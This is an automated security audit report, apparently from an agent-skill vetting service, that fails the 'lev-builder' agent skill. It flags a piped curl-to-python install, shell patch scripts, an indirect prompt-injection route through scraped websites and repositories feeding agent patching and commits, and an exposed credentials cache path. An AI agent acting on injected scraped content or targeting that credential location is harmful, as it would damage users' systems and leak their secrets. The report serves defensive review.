lev-builder
Fail
Audited by Gen Agent Trust Hub on Mar 1, 2026
Risk Level: HIGHREMOTE_CODE_EXECUTIONEXTERNAL_DOWNLOADSCOMMAND_EXECUTIONPROMPT_INJECTIONDATA_EXFILTRATION
Full Analysis
- [REMOTE_CODE_EXECUTION]: The documentation in
references/setup.mdprovides a command that downloads and executes a Python script from an untrusted GitHub repository (yusufkaraaslan/Skill_Seekers) using thecurl -fsSL | python3pattern, which is a high-risk operation. - [EXTERNAL_DOWNLOADS]: The skill requires downloading and installing software from an unverified third-party GitHub account (
yusufkaraaslan) that is not part of the trusted vendors list. - [COMMAND_EXECUTION]: The workflow involves running shell scripts like
apply-patch.shandmigrate-skill.shthat modify the filesystem in core production directories (~/lev/core/) based on external inputs like design documents. - [PROMPT_INJECTION]: The skill has a high surface for indirect prompt injection as it processes data from arbitrary websites and GitHub repositories using the
skill-seekerstool; this ingested data can influence subsequent agent actions such as code generation or patching. - Ingestion points:
skill-seekers scrape(external URLs) andskill-seekers github(external repositories) as documented inreferences/advanced-workflows.md. - Boundary markers: None identified in the scraping or patching logic.
- Capability inventory: Filesystem writes via
apply-patch.sh, code execution viabun testandbun run typecheck, and repository modification viagit commit. - Sanitization: No evidence of escaping or validation of external content before use in patches or commands.
- [DATA_EXFILTRATION]: The documentation in
references/config-resolution.mdexposes sensitive file locations, specifically~/.local/share/lev/auth/which is documented to contain cached credentials, creating a risk of targeted data exposure.
Recommendations
- AI detected serious security threats
Audit Metadata